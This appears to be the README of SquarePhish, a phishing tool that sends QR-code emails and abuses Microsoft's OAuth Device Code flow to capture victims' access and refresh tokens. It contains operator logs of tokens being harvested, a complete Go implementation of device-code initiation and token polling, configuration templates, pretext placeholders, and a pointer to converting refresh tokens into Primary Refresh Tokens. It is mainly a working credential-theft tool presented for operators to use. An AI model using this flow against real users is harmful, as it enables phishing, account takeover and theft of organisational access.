SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device Code authentication flow and QR codes.
See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.
An attacker will send an initial email to the victim that contains a QR code pointing at the SquarePhish server. The idea behind this is to wait until the user is actively reviewing their email before we trigger the OAuth Device Code flow that has a 15 minute expiration window.
The current client id is: Microsoft Authentication Broker
The current scope is: .default offline_access profile openid
INF[2025/04/20 02:29:30] Email sent to victim(s): [email protected]
The victim then scans the QR code in the email body with their mobile device. The QR code directs the victim to the attacker-controlled SquarePhish server, with a URL parameter set to their email address. Once the SquarePhish server receives the incoming QR code scan request, the victim is automatically redirected to Microsoft.
When the SquarePhish server receives the incoming QR code scan request, the OAuth Device Code authentication flow is initiated. The retrieved 'user code' is then sent via email to the victim, who is directed to enter the code on the legitimate Microsoft Device Code website.
Once the email is sent to the victim, a goroutine is started that polls the Microsoft Device Code token endpoint for a completed authentication. Polling continues until the device code expires (15 minutes).
INF[2025/04/20 02:29:34] [[email protected]] Link triggered
INF[2025/04/20 02:29:34] [[email protected]] Initializing device code flow...
INF[2025/04/20 02:29:34] [[email protected]] Client ID: 29d9ed98-a469-4536-ade2-f981bc1d605e
INF[2025/04/20 02:29:34] [[email protected]] Scope: .default offline_access profile openid
The victim receives the second email containing the device user code. The victim then enters the code and continues through the authentication process on Microsoft's Device Code page.
Once the victim authenticates, the background polling retrieves and saves the access and refresh token data.
INF[2025/04/20 02:29:40] [[email protected]] Polling for user authentication...
INF[2025/04/20 02:29:40] [[email protected]] Polling for user authentication...
INF[2025/04/20 02:29:40] [[email protected]] Authentication successful
INF[2025/04/20 02:29:40] [[email protected]] Token retrieved and saved to database
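To make the two halves of the flow concrete, the following is an added Go example, not SquarePhish's own code: StartDeviceCode posts the client_id and scope to the device authorization endpoint, and PollToken is the body of the polling goroutine, which keeps posting the device_code grant until the user signs in, the code expires, or the identity provider returns a terminal error, honoring the slow_down back-off from RFC 8628. The identity provider here is a constructed httptest mock with scripted responses, not Microsoft's endpoints; the /devicecode and /token paths, the mock's device code, user code and token values, and the injectable sleep function are assumptions made for the example. Against a real tenant the two URLs would be the v2.0 devicecode and token endpoints under login.microsoftonline.com.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"sync/atomic"
	"time"
)

type DeviceCodeResponse struct { // fields of the device authorization endpoint's JSON body
	DeviceCode      string `json:"device_code"`
	UserCode        string `json:"user_code"`
	VerificationURI string `json:"verification_uri"`
	ExpiresIn       int    `json:"expires_in"`
	Interval        int    `json:"interval"`
}

type TokenResponse struct { // token endpoint body; Error stays non-empty until sign-in completes
	AccessToken  string `json:"access_token"`
	RefreshToken string `json:"refresh_token"`
	Error        string `json:"error"`
}

func postForm(endpoint string, form url.Values, out interface{}) error {
	resp, err := http.PostForm(endpoint, form)
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	return json.NewDecoder(resp.Body).Decode(out)
}

// StartDeviceCode initiates the flow; the only inputs are client_id and scope.
func StartDeviceCode(deviceCodeURL, clientID, scope string) (*DeviceCodeResponse, error) {
	var dc DeviceCodeResponse
	err := postForm(deviceCodeURL, url.Values{"client_id": {clientID}, "scope": {scope}}, &dc)
	return &dc, err
}

// PollToken is the goroutine body: post the device_code grant until sign-in, expiry, or a terminal error.
func PollToken(tokenURL, clientID string, dc *DeviceCodeResponse, sleep func(time.Duration)) (*TokenResponse, error) {
	interval, deadline := time.Duration(dc.Interval)*time.Second, time.Now().Add(time.Duration(dc.ExpiresIn)*time.Second)
	form := url.Values{"grant_type": {"urn:ietf:params:oauth:grant-type:device_code"}, "client_id": {clientID}, "device_code": {dc.DeviceCode}}
	for time.Now().Before(deadline) {
		var tr TokenResponse
		if err := postForm(tokenURL, form, &tr); err != nil {
			return nil, err
		}
		switch tr.Error {
		case "": // sign-in completed: access and refresh tokens issued
			return &tr, nil
		case "authorization_pending": // keep polling at the same interval
		case "slow_down": // RFC 8628 section 3.5: add 5 seconds to the interval
			interval += 5 * time.Second
		default: // expired_token, access_denied, bad_verification_code: stop polling
			return nil, fmt.Errorf("token endpoint: %s", tr.Error)
		}
		sleep(interval) // injectable so the mock run (and a test) does not block for real seconds
	}
	return nil, fmt.Errorf("device code expired before the user authenticated")
}

// NewMockTenant is a constructed stand-in for the identity provider: polls answer the scripted codes ("" = tokens), then expired_token.
func NewMockTenant(script []string) *httptest.Server {
	var polls int32
	mux := http.NewServeMux()
	mux.HandleFunc("/devicecode", func(w http.ResponseWriter, r *http.Request) {
		json.NewEncoder(w).Encode(DeviceCodeResponse{DeviceCode: "mock-device-code", UserCode: "ABCD1234", VerificationURI: "https://microsoft.com/devicelogin", ExpiresIn: 900, Interval: 5})
	})
	mux.HandleFunc("/token", func(w http.ResponseWriter, r *http.Request) {
		code := "expired_token"
		if n := int(atomic.AddInt32(&polls, 1)) - 1; n < len(script) {
			code = script[n]
		}
		if code != "" {
			w.WriteHeader(http.StatusBadRequest) // the real endpoint also answers 400 while pending
			json.NewEncoder(w).Encode(TokenResponse{Error: code})
			return
		}
		json.NewEncoder(w).Encode(TokenResponse{AccessToken: "mock-access-token", RefreshToken: "mock-refresh-token"})
	})
	return httptest.NewServer(mux)
}

func main() {
	srv := NewMockTenant([]string{"authorization_pending", "slow_down", "authorization_pending", ""})
	defer srv.Close()
	clientID := "29d9ed98-a469-4536-ade2-f981bc1d605e" // Microsoft Authentication Broker, as in the log above
	dc, err := StartDeviceCode(srv.URL+"/devicecode", clientID, ".default offline_access profile openid")
	if err != nil {
		panic(err)
	}
	fmt.Printf("user code %s at %s\n", dc.UserCode, dc.VerificationURI)
	tr, err := PollToken(srv.URL+"/token", clientID, dc, func(d time.Duration) { fmt.Println("would sleep", d) })
	fmt.Printf("tokens: %+v, err: %v\n", tr, err)
}
```

The deadline is taken from expires_in in the device code response, which is what gives the 15-minute window the text mentions; a real implementation runs one PollToken per victim in its own goroutine and persists the TokenResponse on success. Note that only an empty error field is treated as success, so an unexpected error code stops the loop instead of being polled forever.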
SquarePhish does not have authentication in front of the admin dashboard and as a result should be run behind a firewall and not exposed to the internet. The included configuration template binds the dashboard to 127.0.0.1 for this reason; only the phish server needs to be reachable by victims.
usage: squarephish [<flags>]
Flags:
-h, --[no-]help Show context-sensitive help (also try --help-long and --help-man).
-c, --config="config.json" Path to the config file
-v, --[no-]verbose Enable verbose logging
--[no-]version Show application version.
example: ./squarephish --config config.json
Modify the included configuration file config.json or use the below template:
{
  "dashboard_server": {
    "listen_url": "127.0.0.1:8080",
    "cert_path": "",
    "key_path": "",
    "use_tls": false
  },
  "phish_server": {
    "listen_url": "0.0.0.0:8443",
    "cert_path": "server.crt",
    "key_path": "server.key",
    "use_tls": true
  }
}
The dashboard view lets the operator view simple metrics relating to the current campaign. Metrics include the number of emails sent, the number of QR codes that have been scanned, and a list of credentials retrieved. Each credential can be viewed in a new tab as a JSON object.
The configuration page lets the operator set the core settings for SquarePhish. The following settings are to be configured:
- SMTP host and credentials
- SquarePhish server settings (to be used when generating the initial QR code)
- Subject and Sender for all emails (QR code and device code)
- The device code email body template (used automatically when a QR code is scanned)
The send email page lets an operator specify a recipient and an initial QR code email template. The operator can then send emails to all recipient(s).
Included is a function from @denniskniep's DeviceCodePhishing PoC that automatically retrieves the authentication URL based on the generated device code. This technique removes the requirement for sending a second email to the victim containing the device code. Instead, once the QR code is scanned or the URL is clicked, the victim is redirected straight to the authentication page for the given OAuth flow.
The included snippet from DeviceCodePhishing is licensed under Apache 2.0.
When using the Microsoft Authentication Broker client id, an attacker can take the returned refresh token and convert it into a Primary Refresh Token (PRT) using the included gimmePRT Python tool.
Currently, SquarePhish provides several pretext references that can be found in the pretexts folder.
Important: When writing a custom pretext, note the required data for the following emails:
- QR Code Email: Include <img src="cid:qrcode"> for QR image insertion.
- ASCII QR Code Email: Include {QR_CODE} for ASCII QR code insertion.
- Device Code Email: Include {DEVICE_CODE} for device user code insertion.
The original version of SquarePhish, written in Python, is hosted here.